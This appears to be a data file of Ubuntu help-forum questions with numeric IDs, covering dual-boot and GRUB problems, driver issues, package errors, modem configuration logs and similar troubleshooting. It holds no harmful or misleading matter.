unfortunately i need to have ubuntu work in the legacy mode ( non-uefi ) since i have to dual boot this with another os that does n't work in uefi mode . anyways , i am stuck right now even in trying to get a normal ubuntu only installation in the legacy mode , though the livedvd mode works fine .
523319	why are upgrades to ubuntu 14.04 destroying my system ?	i am running ubuntu 14.04 . seems like there are updates nearly daily , and often they actually slow things down or make them work worse . today 's updates have totally slowed down my machine to where changing windows is a slow fade to the new one , and this is totally unacceptable for what used to be such a great os . help !
523321	machine check exception cpu error	i got a machine check exception error earlier , does this mean my cpu is corrupt ? what is the problem here ? i keep getting this error randomly and the system shuts off .
523324	error setting up cscope 15.8 on when creating file cscope.files	i 'm running native ubuntu 14.04 . i 'm trying to install cscope-15.8a . when i run the command find . -name `` *.c '' -o -name .cpp '' -o -name `` .h '' -o -name `` *.hpp '' > cscope.files it changes the prompt from $ to > i do n't know what shell i 'm running or what i 've done to my console . how do i run this command without causing this problem ? the file `` cscope.files '' does not get created . thanks
523327	how i can installing jdeveloper on ubuntu 14.4 ?	iam downloading jdeveloper `` jdevstudio11117install.bin '' on ubuntu and open terminal to installing it , and put this code `` ./jdevstudio11117install.bin '' to install it but no install complete , terminal tell `` elmunch @ ubuntu : ~ $ ./jdevstudio11117install.bin bash : ./jdevstudio11117install.bin : no such file or directory '' ineed code terminal to install jdeveloper
523330	ca n't get grub menu to work after installing ubuntu 14.04	i installed ubuntu 14.04 on my laptop and had it set up for a dual boot between ubuntu and windows 8 . everything worked fine until i decided to try reinstalling it with the root partition on an ssd drive ( the one originally used for windows 8 speed boot ) and /home on the hdd . i have since scrapped this idea after trying multiple methods and no success . after installing ubuntu this way , i was n't able to get a grub menu . so , i reinstalled ubuntu the way i had originally ( root , /home , and swap on separate partitions on the hdd ) and still could n't get a grub menu . i tried booting using the livecd which worked but when using boot-repair , i get an error with this output : http : //paste2.org/cv7xfshs i also tried mounting the ubuntu drive while using the livecd and reinstalling grub from there , which resulted in `` grub-install : error : can not find efi directory '' . i have since reformatted from the windows repair menu ( although , this did n't format the ubuntu partitions for me ) and have reinstalled ubuntu multiple times . what are my options here ? thanks for any suggestions !
523331	déjà dup wo n't back up ~/.config/nautilus-actions	i 'm a mostly-noob with ubuntu . running 14.04 lts 64-bit . i use déjà dup to backup my entire home folder , daily , to an external 32gb sandisk usb flash drive . but after every backup , déjà dup tells me : '' could not back up the following files . please make sure you are able to open them . '' the folder that wo n't backup : `` /home/username/.config/nautilus-actions '' question : should i worry about this ? is it important that i successfully backup this folder/file ? if so , then how do you advise ? if it is n't important , then what am i losing by not backing it up ? and in that case , how do i configure déjà dup so that it stops annoyingly telling me that it failed to backup this folder/file ? ( i already tried changing the folder's/file 's permissions to make it owner-executable , assuming that would give déjà dup access . but after i did that and logged back in , i got an error report . i 'd apparently screwed with my system . do n't know how to look up the specifics of that error report — if that info would help , could you advise me on how to retrieve it ? ) thanks a billion .
523332	bluetooth device not detected	bluetooth is not working in my lenovo yoga . i have tried dozens of solutions posted on this forum , and i think i just made everything worse . so i 'd appreciate it if an expert can give me some guidance . my first problem is that hcitool dev is empty now , it was n't a day ago ! the bluetooth adapter is a realtek rtl8723au . i installed the drivers following this link : lenovo yoga 13 realtek wireless driver
523335	i make my usb bootable of ubuntu but it is not working on acer 4738z	i am in serious problem . i have acer aspire 4738z . i am willing to install ubuntu 14.04.1 on it and for that i made my usb bootable through the software which is mentioned in ubuntu guide but it is not recognized by the laptop at startup and when my old windows is opened i run wibi from it but after restarting it does n't work . help me please
523337	how can i correct a 502 proxy error for a single source when updating sources on ubuntu 14.04 ?	i am behind a proxy on ubuntu 14.04 trusty and need to add the source for makerbot software and install the makerware software . when i add the source and run the command to update package lists , i get a 502 error only on that source . every other source , including 3rd party sources like dropbox and google chrome update with no problem . the kicker is that this same source works fine with ubuntu 12.04 precise . i called makerbot customer service and they verified that their servers are up so this seems to be an error with ubuntu 14.04 on my end . ... hit http : //linux.dropbox.com trusty release.gpg err http : //﻿﻿downloads.makerbot.com trusty/main amd64 packages 502 proxy error ( the host was not found. ) get:2 http : //us.archive.ubuntu.com trusty-updates release.gpg [ 933 b ] err http : //﻿﻿downloads.makerbot.com trusty/main i386 packages 502 proxy error ( the host was not found. ) ign http : //﻿﻿downloads.makerbot.com trusty/main translation-en_us hit http : //us.archive.ubuntu.com trusty release ... hit http : //security.ubuntu.com trusty-security/main translation-en hit http : //security.ubuntu.com trusty-security/multiverse translation-en hit http : //security.ubuntu.com trusty-security/restricted translation-en hit http : //security.ubuntu.com trusty-security/universe translation-en fetched 2,059 kb in 13s ( 148 kb/s ) w : failed to fetch http : //﻿﻿downloads.makerbot.com/makerware/ubuntu/dists/trusty/main/binary-amd64/packages 502 proxy error ( the host was not found. ) w : failed to fetch http : //﻿﻿downloads.makerbot.com/makerware/ubuntu/dists/trusty/main/binary-i386/packages 502 proxy error ( the host was not found. ) e : some index files failed to download . they have been ignored , or old ones used instead.`
523339	problem in connection with internet	recently i upgraded to ubuntu 14.04 lts from 12.01 . after up gradation my ethernet connection could't established . but when i used advanced option during boot and open ubuntu pae version i can automatically connected to ethernet . i have windows 7 also installed in my system . i have tried to repair by recovery mode but it does't work . please help ! when i does enable networking in recovery mode message comes out- /dev/sda6 is not continuous . also sys/devices/pci0000:00/0000:00:19.0 is not responding by any plugins .
523340	heap memory usage linux vs windows	why java application get more heap when it run on linux ubuntu , rather than windows ? about 4 time larger heap size !
523341	ubuntu 14.04 upgrade does not work and shows a black screen on booting	i know this may seem like a duplicate but the other answers i found did not satisfy mecompletely , and i still have some doubts on how to proceed . my ubuntu does not boot properly . i have just upgraded to 14.04 from 12.04 , and now there seems to be a problem . i have grub interface with windows xp and ubuntu.xp is working fine but if i choose ubuntu then a black screen with some pixels of colour and a cursor appears instead of the normal login screen.i have tried 2 of the methods that have listed as a solution to this problem i.e increase brightness by fn + f7 , and nomodeset.i am using nvidia and when the grub interface came up i pressed e and got a screen that seemed different from the one i was told to expect.the nomodeset option was not there at all . i am now considering carrying out a boot repair or a complete reinstallation of ubuntu . as i am still relatively inexperienced at this , i would really like some advice on how to proceed . my situation seems to fit several of the existing parameters for the problems that have been listed on the site .
523342	creating wifi hotspot but internet is not accessible	i created wifi hotspot on ubuntu 14.04 , it got created but i can not access internet . wifi is getting connect.internet connection is dsl connetction .
523343	failed to download repository information check your internet connection . 12.04	i 'm trying to upgrade ubuntu , but i keep having this error . there 's nothing wrong with the internet connection . tx
523344	modem manager in ubuntu14.04	i am using mc509 in a ubuntu 14.04 box . uname -a ; lsb_release -a linux hbox-0100b5 3.10.17 # 1 smp wed sep 3 02:38:52 pdt 2014 armv7l armv7l armv7l gnu/linux no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty the module is detected correct and using the correct driver . lsusb ; usb-devices bus 002 device 002 : id 12d1:1404 huawei technologies co. , ltd . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 0424:2412 standard microsystems corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub t : bus=01 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=480 mxch= 1 d : ver= 2.00 cls=09 ( hub ) sub=00 prot=01 mxps=64 # cfgs= 1 p : vendor=1d6b prodid=0002 rev=03.10 s : manufacturer=linux 3.10.17 ehci_hcd s : product=ehci host controller s : serialnumber=ci_hdrc.0 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub t : bus=01 lev=01 prnt=01 port=00 cnt=01 dev # = 2 spd=480 mxch= 2 d : ver= 2.00 cls=09 ( hub ) sub=00 prot=01 mxps=64 # cfgs= 1 p : vendor=0424 prodid=2412 rev=0b.b2 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=2ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub t : bus=02 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=480 mxch= 1 d : ver= 2.00 cls=09 ( hub ) sub=00 prot=01 mxps=64 # cfgs= 1 p : vendor=1d6b prodid=0002 rev=03.10 s : manufacturer=linux 3.10.17 ehci_hcd s : product=ehci host controller s : serialnumber=ci_hdrc.1 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub t : bus=02 lev=01 prnt=01 port=00 cnt=01 dev # = 2 spd=12 mxch= 0 d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=12d1 prodid=1404 rev=00.00 s : manufacturer=huaã¿wei technologies s : product=huawei mobile s : serialnumber=ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ã¿ c : # ifs= 5 cfg # = 1 atr=a0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 3 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 1 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 2 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 3 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 4 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver=option . ls -al /dev/serial/by-id total 0 drwxr-xr-x 2 root root 140 sep 12 17:31 . drwxr-xr-x 4 root root 80 sep 12 17:31 .. lrwxrwxrwx 1 root root 13 sep 12 17:31 usb-hua ? ? wei_technologies_huawei_mobile-if00-port0 - > ../../ttyusb0 lrwxrwxrwx 1 root root 13 sep 12 17:31 usb-hua ? ? wei_technologies_huawei_mobile-if01-port0 - > ../../ttyusb1 lrwxrwxrwx 1 root root 13 sep 12 17:31 usb-hua ? ? wei_technologies_huawei_mobile-if02-port0 - > ../../ttyusb2 lrwxrwxrwx 1 root root 13 sep 12 17:31 usb-hua ? ? wei_technologies_huawei_mobile-if03-port0 - > ../../ttyusb3 lrwxrwxrwx 1 root root 13 sep 12 17:31 usb-hua ? ? wei_technologies_huawei_mobile-if04-port0 - > ../../ttyusb4 using wv dial i am able connect to the network . i have a need to use the modem manager and dbus modem-manager interface.i am a novice using modem manager . this is how i configured modem manager . mmcli -l found 1 modems : /org/freedesktop/modemmanager1/modem/0 [ huawei technologies co. , ltd. ] mc509 mmcli -m 0 /org/freedesktop/modemmanager1/modem/0 ( device id '465738ce82d321b55ab1d1890635105d5429fca6 ' ) -- -- -- -- -- -- -- -- -- -- -- -- - hardware | manufacturer : 'huawei technologies co. , ltd.' | model : 'mc509' | revision : '11.106.19.03.322' | supported : 'cdma-evdo' | current : 'cdma-evdo' | equipment id : '8001bf7e' -- -- -- -- -- -- -- -- -- -- -- -- - system | device : '/sys/devices/soc0/soc.1/2100000.aips-bus/2184200.usb/ci_hdrc.1/usb2/2-1' | drivers : 'option1' | plugin : 'huawei' | primary port : 'ttyusb2' | ports : 'ttyusb0 ( at ) , ttyusb1 ( qcdm ) , ttyusb2 ( at ) , ttyusb4 ( at ) ' -- -- -- -- -- -- -- -- -- -- -- -- - numbers | own : '8508193144' -- -- -- -- -- -- -- -- -- -- -- -- - status | lock : 'none' | unlock retries : 'unknown' | state : 'connected' | power state : 'on' | access tech : 'evdoa' | signal quality : '40 ' ( recent ) -- -- -- -- -- -- -- -- -- -- -- -- - modes | supported : 'allowed : 2g ; preferred : none | allowed : 3g ; preferred : none | allowed : 2g , 3g ; preferred : none' | current : 'allowed : 2g , 3g ; preferred : 3g' -- -- -- -- -- -- -- -- -- -- -- -- - bands | supported : 'unknown' | current : 'unknown' -- -- -- -- -- -- -- -- -- -- -- -- - ip | supported : 'ipv4' -- -- -- -- -- -- -- -- -- -- -- -- - cdma | meid : 'unknown' | esn : '8001bf7e' | sid : 'unknown' | nid : 'unknown' | registration : cdma1x 'unknown' | ev-do 'home' | activation : 'unknown' -- -- -- -- -- -- -- -- -- -- -- -- - sim | path : 'none' mmcli -m 0 -- simple-connect= '' user= '' , password= '' , number= # 777 '' says successfully connected but i don’t see any ppp interface listed in ifconfig mmcli -m 0 -- simple-status /org/freedesktop/modemmanager1/modem/0 -- -- -- -- -- -- -- -- -- -- -- -- - status | state : 'connected' | signal quality : '40 ' ( recent ) | bands : 'unknown' | access tech : 'evdoa' -- -- -- -- -- -- -- -- -- -- -- -- - cdma | sid : 'unknown' | nid : 'unknown' | registration : cdma1x 'unknown' | ev-do 'home' ifconfig -a eth0 link encap : ethernet hwaddr d8 : b8 : f6:01:00 : f5 broadcast multicast mtu:1500 metric:1 rx packets:938 errors:0 dropped:0 overruns:0 frame:0 tx packets:184 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:105367 ( 105.3 kb ) tx bytes:16454 ( 16.4 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:8 errors:0 dropped:0 overruns:0 frame:0 tx packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:592 ( 592.0 b ) tx bytes:592 ( 592.0 b ) sit0 link encap : ipv6-in-ipv4 noarp mtu:1480 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 88:33:14:4d : a1:34 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) here is modemmanager logs from /var/log/syslog . grep -i modem /var/log/syslog sep 12 20:10:26 localhost kernel : usbserial : usb serial support registered for gsm modem ( 1-port ) sep 12 20:10:26 localhost kernel : option 2-1:1.0 : gsm modem ( 1-port ) converter detected sep 12 20:10:26 localhost kernel : usb 2-1 : gsm modem ( 1-port ) converter now attached to ttyusb0 sep 12 20:10:26 localhost kernel : option 2-1:1.1 : gsm modem ( 1-port ) converter detected sep 12 20:10:26 localhost kernel : usb 2-1 : gsm modem ( 1-port ) converter now attached to ttyusb1 sep 12 20:10:26 localhost kernel : option 2-1:1.2 : gsm modem ( 1-port ) converter detected sep 12 20:10:26 localhost kernel : usb 2-1 : gsm modem ( 1-port ) converter now attached to ttyusb2 sep 12 20:10:26 localhost kernel : option 2-1:1.3 : gsm modem ( 1-port ) converter detected sep 12 20:10:26 localhost kernel : usb 2-1 : gsm modem ( 1-port ) converter now attached to ttyusb3 sep 12 20:10:26 localhost kernel : option 2-1:1.4 : gsm modem ( 1-port ) converter detected sep 12 20:10:26 localhost kernel : usb 2-1 : gsm modem ( 1-port ) converter now attached to ttyusb4 sep 12 20:10:33 localhost modemmanager [ 944 ] : < info > modemmanager ( version 1.0.0 ) starting ... sep 12 20:10:33 localhost modemmanager [ 944 ] : < warn > ( ttyusb0 ) : port attributes not fully set sep 12 20:10:33 localhost modemmanager [ 944 ] : < warn > ( ttyusb1 ) : port attributes not fully set sep 12 20:10:33 localhost modemmanager [ 944 ] : < warn > ( ttyusb2 ) : port attributes not fully set sep 12 20:10:33 localhost modemmanager [ 944 ] : < warn > ( ttyusb3 ) : port attributes not fully set sep 12 20:10:33 localhost modemmanager [ 944 ] : < warn > ( ttyusb4 ) : port attributes not fully set sep 12 20:10:36 localhost networkmanager [ 992 ] : < info > modemmanager available in the bus sep 12 20:10:36 localhost modemmanager [ 944 ] : < warn > ( ttyusb1 ) : port attributes not fully set sep 12 20:10:36 localhost modemmanager [ 944 ] : < warn > ( ttyusb2 ) : port attributes not fully set sep 12 20:10:36 localhost modemmanager [ 944 ] : < warn > ( ttyusb3 ) : port attributes not fully set sep 12 20:10:36 localhost modemmanager [ 944 ] : < warn > ( ttyusb4 ) : port attributes not fully set sep 12 20:10:54 localhost modemmanager [ 944 ] : < info > creating modem with plugin 'huawei ' and '5 ' ports sep 12 20:10:54 localhost modemmanager [ 944 ] : < warn > could not grab port ( tty/ttyusb3 ) : ' can not add port 'tty/ttyusb3 ' , unhandled serial type' sep 12 20:10:54 localhost modemmanager [ 944 ] : < warn > ( ttyusb2 ) : port attributes not fully set sep 12 20:10:54 localhost modemmanager [ 944 ] : < info > modem for device at '/sys/devices/soc0/soc.1/2100000.aips-bus/2184200.usb/ci_hdrc.1/usb2/2-1 ' successfully created sep 12 20:10:54 localhost modemmanager [ 944 ] : < warn > could n't load unlock retries : 'sim not inserted' sep 12 20:10:54 localhost modemmanager [ 944 ] : < warn > could n't load current bands : 'could n't build bands array from '7 '' sep 12 20:10:54 localhost modemmanager [ 944 ] : < info > modem : state changed ( unknown - > disabled ) sep 12 20:11:15 localhost modemmanager [ 944 ] : < info > simple connect started ... sep 12 20:11:15 localhost modemmanager [ 944 ] : < info > simple connect state ( 3/8 ) : enable sep 12 20:11:15 localhost modemmanager [ 944 ] : < info > modem /org/freedesktop/modemmanager1/modem/0 : state changed ( disabled - > enabling ) sep 12 20:11:15 localhost networkmanager [ 992 ] : < info > ( ttyusb2 ) modem state changed , 'disabled ' -- > 'enabling ' ( reason : user-requested ) sep 12 20:11:15 localhost modemmanager [ 944 ] : < warn > ( ttyusb2 ) : port attributes not fully set sep 12 20:11:15 localhost modemmanager [ 944 ] : < warn > ( ttyusb4 ) : port attributes not fully set sep 12 20:11:16 localhost modemmanager [ 944 ] : < info > modem /org/freedesktop/modemmanager1/modem/0 : state changed ( enabling - > registered ) sep 12 20:11:16 localhost networkmanager [ 992 ] : < info > ( ttyusb2 ) modem state changed , 'enabling ' -- > 'registered ' ( reason : user-requested ) sep 12 20:11:16 localhost modemmanager [ 944 ] : < info > simple connect state ( 4/8 ) : wait to get fully enabled sep 12 20:11:16 localhost modemmanager [ 944 ] : < info > simple connect state ( 5/8 ) : register sep 12 20:11:16 localhost modemmanager [ 944 ] : < info > modem /org/freedesktop/modemmanager1/modem/0 : signal quality updated ( 40 ) sep 12 20:11:16 localhost modemmanager [ 944 ] : < info > modem /org/freedesktop/modemmanager1/modem/0 : access technology changed ( unknown - > evdoa ) sep 12 20:11:16 localhost modemmanager [ 944 ] : < info > simple connect state ( 6/8 ) : bearer sep 12 20:11:16 localhost modemmanager [ 944 ] : < info > simple connect state ( 7/8 ) : connect sep 12 20:11:16 localhost modemmanager [ 944 ] : < info > modem /org/freedesktop/modemmanager1/modem/0 : state changed ( registered - > connecting ) sep 12 20:11:16 localhost networkmanager [ 992 ] : < info > ( ttyusb2 ) modem state changed , 'registered ' -- > 'connecting ' ( reason : user-requested ) sep 12 20:11:16 localhost modemmanager [ 944 ] : < warn > ( ttyusb0 ) : port attributes not fully set sep 12 20:11:18 localhost modemmanager [ 944 ] : < info > modem /org/freedesktop/modemmanager1/modem/0 : state changed ( connecting - > connected ) sep 12 20:11:18 localhost networkmanager [ 992 ] : < info > ( ttyusb2 ) modem state changed , 'connecting ' -- > 'connected ' ( reason : user-requested ) sep 12 20:11:18 localhost modemmanager [ 944 ] : < info > simple connect state ( 8/8 ) : all done .
523347	some advice regarding software	hey guys i wanted to ask if there will be any inconvenience if i use linux . the problem is my teacher has recommended me 1 . ) g++ compiler 2 . ) notepad ++ 3 . ) ms visual studio 2012 what are the alternatives or i will have to purchase windows . i am currently using linux mint 17 and loving it . plus really limited on resources because i am a computer science student . secondary question can you tell me where to get some free games ?
523349	xbox 360 controller shows up on jstest and configures , but does n't work with minecraft	i recently recently installed ubuntu 14.04 on and acer c720 and installed minecraft ( this is going to be my son 's computer ) . i installed xboxdrv and disabled xpad . when i used jstest the xbox 360 controller shows up and i can calibrate it . however , the lights on the controller continue to blink like it is not synced with the usb receiver and when i tried to use the controller , it did n't work . would any of you know why , if the controller shows up and calibrates , it is not working with minecraft ? my son is able to use it on our pc presently . thanks for your help .
523353	untar content of folder from tar.gz archive that get 's data from stdout ( wget )	i want to extract the content of a single folder from a tar.gz archive that get 's it 's input from the stdout of wget . my command looks like this : wget -o - http : //example.com/file.tar.gz | tar -c /path/where/toextract/to -xzf - foldertountar unfortunally what i get is the main folder of the archvie , not the contents of `` foldertountar '' .
523355	how do i reinstall package `` mount '' ?	when trying to update , use software center , install via apt-get in terminal , open synaptic package manager i get an error that reads `` the package mount needs to be reinstalled , but i ca n't find an archive for it . '' how can i reinstall the package if none of the instillation apts can mount the file systems to install the broken package ?
523356	installer does n't see windows 8.1 installed and propose to erase the disk	i bought dell 3147 laptop , windows 8.1 x64 preinstalled . i would like to install ubuntu as seconds os . i boot from cd and try `` install ubuntu '' . by some reason ubuntu installer says `` this computer currently has no detected operation system '' , then it propose to erase the disk . why ubuntu installer does n't see that windows 8.1 64 is installed already ? is it just not smart enough or something wrong with my pc ? can ubuntu itself create `` dualboot '' ? what is the best way to install ubuntu as second os ?
523357	gnome shell font problem	i am using gnome-shell for the first time and am liking the speed of the de . there 's a ui glitch which is annoying . when typing certain letters i get others . this is also true of certain ui text elements like the following example :
523358	ca n't boot into either windows or ubuntu	history i first installed windows 8.1 and left around 60gbs unallocated . then i tried installing ubuntu with a usb , but the partition table i had made did not show up . i then tweaked some settings in my bios/uefi and then again tried still with no luck . finally i did sudo gdisk /dev/sda and got rid of my gpt partition but left the mbr ( or i do n't know windows partition ) untouched . then i tried and it successfully showed the partition table and i was able to make changes . i made : [ sda5 ] linux-swap of 1.91 gib [ sda6 ] '/ ' or root of 19.07 gib [ sda7 ] '/home ' of 34.44 gib with 1.02 mib unallocated also , my sda1-3 are for windows ( 1-system reserved , 2-os , 3-storage drive ) and sda5,6,7 are sub parts of sda4 i completed the installation and then i was successfully able to run ubuntu , but the problem was that there was no option to boot into windows , so i searched and found out there were some problems with grub . i made some tweaks and restarted and even ubuntu stopped working . so i again searched and with the help of live usb made some changes . changes made were reinstalling grub 2 in sda6 . problem but the problem came error : file '/grub/i386-pc/normal.mod ' not found and then i did that ( reinstall ) which led me to gnu grub minimal bash like line editing ... .. now what i have is all my operating systems perfectly lying in my hard disk but i can not boot any of them . all i can do is boot from live usb . i also tried to install grub 2 again but with no luck . it says installing for i386-pc platform and then installation finished . no errors reported . but still does not work . i have even tried resetting my bios settings . ps : laptop - lenovo b490
523362	vlc crashes while playing wmv vidoes in ubuntu 14.04	guys i 'm in a serious need of help as whenever i try to play wmv videos in vlc then for a flick of a second the video plays and then vlc crashes in ubuntu 14.04 . earlier solutions on this topic proved useless to me ... .plz guys i 'm in dire need of help .
523364	to render a simple html file in localhost	i am going through the david malan lecture on php , , so i have created a simple google.html file on /public_html/google.html which is as follows : anupam @ jazz : ~/public_html $ more google.html < ! doctype html > < html > < head > < title > google < /title > < /head > < body > < div style = `` text-align : center '' > < h1 > google < /h1 > < form action = `` http : //www.google.com/search '' method = `` get '' > < input name = `` q '' style = `` width : 400px '' type = `` text '' > < br > < input type = `` submit '' value = `` google search '' > < input type = `` submit '' value = `` i am feeling lucky '' > < /form > < /div > < /body > < /html > when i tried for http : //localhost/~anupam/google.html , i got the error 404 not found the requested url /~anupam/google.html was not found on this server . apache/2.4.7 ( ubuntu ) server at localhost port 80 why i am unable to run it through localhost , i am running apache2 ,
523366	will ubuntu be updated to support `` 2 in 1 ultrabooks '' like the asus t100 in the future ?	hi i am wondering if ubuntu will be getting updates or patches to work better with `` 2 in 1 ultrabooks '' . right now ubuntu has many bugs when it comes to these `` 2 in 1 computers '' so i am just wondering if there is any progress in this field especially with the asus t100 , which is the ultrabook i currently own .
523367	disadvantages of installing ubuntu trough qemu/kvm	since i am testing iso 's a lot and i want to do so on real hardware , but ca n't stand the install process and the associated waiting time ( i only have one machine ) i have written a script that installs ubuntu for me using qemu/kvm to an real usb drive . that way i can work on other things during the installation process and do not put my data at risk . later i boot on my real hardware from that usb and use that as my testing system . i have been doing that for a long time and never encountered a single issue that was due the way i installed ubuntu . ( when there was doubt i manually installed on the hardware ) . i mean technically speaking most of what the installer does is copying files from a squashfs image and settings things up the way one configured in the installer . there is only one step in ubiquity called `` configuring hardware '' that i do not know what it does and could make a difference , but i have never noticed it . i haven been told various times that the way i install is bad , since installing through qemu/kvm could bring things , but i have never any real good argument against this method . what can break specifically ? what can break more likely compared to installing manually on real hardware ? i would really welcome good ( and clear ) arguments .
523369	how do i convert a sysv-init script to an upstart job ?	i would like to convert the slapd ldap server init script to an upstart service . however , i have very little knowledge of sysv init scripts ( and the lsb ( ? ) stuff ) . specifically , i 'm interested in the respawn capability of upstart . the slapd init script from ubuntu 14.04 is here . the upstart service i have come up with is here . have i migrated enough things from the sysv script ? have i made mistakes ? things i have n't understood from the sysv script , i have n't included in the upstart job . could someone explain this sysv init script to me ? background : i have a few ldap servers in n-way multi-master replication . there 's a known bug which may be causing memory leaks , leading to the slapd daemons occasionally falling prey to the oom killer . my options include : getting slapd to respawn ( the subject of this question ) . using a newer version of openldap ( probably compiled from source ) . throwing more ram at the server .
523370	get exclusive lock constant ? in ctypes it is o_exlock	i 'm trying to open a file with exclusive lock via javscript . so the library to open is no sweat just the number to pass as unixflags is a problem . this is syntax : os.file.open ( '/path/to/file ' , { unixflags : number_here } ) ; does anyone know the number to put in number_here which is falg for exclusive lock ? thanks
523372	12.04 package system broken apt-get autoremove -f fails	i am trying to install all of the latest updates for ubuntu 12.04 . new hardware support and linux-image-3.11.0-26-generic ( new install ) 57.1mb are what i have remaining . update manager tells me `` package system broken '' and suggests i use apt-get autoremove -f to fix unmet dependencies . running this gives me an error with no additional tips on how to fix it . here is my terminal output : sudo apt-get autoremove -f [ sudo ] password for user : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-image-3.11.0-26-generic suggested packages : fdutils linux-lts-saucy-doc-3.11.0 linux-lts-saucy-source-3.11.0 linux-lts-saucy-tools the following packages will be removed : libindicate-gtk3 the following new packages will be installed : linux-image-3.11.0-26-generic 0 upgraded , 1 newly installed , 1 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/57.1 mb of archives . after this operation , 154 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 168779 files and directories currently installed . ) unpacking linux-image-3.11.0-26-generic ( from ... /linux-image-3.11.0-26-generic_3.11.0-26.45~precise1_i386.deb ) ... this kernel does not support a non-pae cpu . dpkg : error processing /var/cache/apt/archives/linux-image-3.11.0-26-generic_3.11.0-26.45~precise1_i386.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-26-generic /boot/vmlinuz-3.11.0-26-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-26-generic /boot/vmlinuz-3.11.0-26-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.11.0-26-generic_3.11.0-26.45~precise1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) here are the results from what fkraiem suggested . i edited my grub file to read : grub_cmdline_linux_default= '' quiet splash forcepae '' grub_cmdline_linux= '' forcepae '' i updated my grub configuration and rebooted . i tried running apt-get -f install again . i am experiencing the exact same output as above though . it seems adding the forcepae switch did not do anything . apt-get autoremove fails as well , suggesting i run apt-get -f install which produces the output seen above . i am unable to install any updates or programs . this is an hp compaq nc4010 with a 1.7ghz pentium m
523376	can i install ubuntu on a brand new ssd from a flash drive ?	i 'm thinking about buying a 30gb ssd for my laptop and want to know if it 's possible to install linux on it via flash drive with nothing else needing to be done . i just do n't want to spend the money on it unless i know for sure i can do this .
523381	can i use pinch to zoom in evince ?	i have a touch screen device running ubuntu . when viewing pdfs in evince i can use one finger scrolling and it 's very fluent and satisfying . i am looking for more support for touch gestures . specifically , looking at these patch notes and a quick google would suggest that evince should supports pinch to zoom , however it does n't seem to work for me . is there some flag or command i need to make evince understand pinch to zoom . can i activate this feature somehow ? additional information : $ evince -- version gnome document viewer 3.10.3 $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty update : according to the gnome source it looks like evince will support pinch gestures in version 3.13.90 .
523395	ubuntu 14.04 only has 2 ways to display my folders . can i get the other option back ?	in ubuntu 12.04 i had 3 choices of displaying my folders but now i have upgraded to 14.04 and there are only 2 choices to display my folders . i do n't like 'icon ' view and i do n't like 'list ' where one folder is on top of the other . i like the folders to fill the whole window , on top of each other but also to the sides just like i had it in 12.04 . is there anything i can do to get my preferrd folder view back ? ? thanks
523396	ubuntu server stuck on startx	this is the first time i open a topic in this forum . so ... i bought a dedicated server and i 'm still trying to get access via putty and remote desktop connection ( windows 7 ) to work inside the server without terminal ( i love terminal : p ) . following some guides on the internet , i installed sudo apt-get install ubuntu-desktop and then i launch `` startx '' but ... ( pastebin cause i ca n't insert more than two links : p ) http : //pastebin.com/kklascet
523397	i want to install wifi card , but my additional drives is empty	today , i install ubuntu 14.04 version . and i want to connect my wifi . but the system can not find my wifi card in the additional drivers , by the way my additional drivers window is empty . how to solve this problem ? lspci -nn | grep 0280 shows ... realtek semiconduct co. , ltd. rtl8192ee pci e wireless neteork adapter [ 10ec:818b ]
523398	can ubuntu run ms windows discs ?	can ubuntu run the physical plastic discs that are made for ms windows ? i am currently waiting on the download and hope it works as i need to run ms discs for school .
523399	mount : root failed : invalid argument	i just upgraded mu ubuntu ( 14.04 ) and when i restarted my computer i got messages like : mount : mounting /dev/loop ) on /root failed : invalid argument . . . target file system does n't have requested /sbin/init no init found . tyr passing init=bootarg ( initramfs ) iâve installed ubuntu on windows drive . please help me solving this .
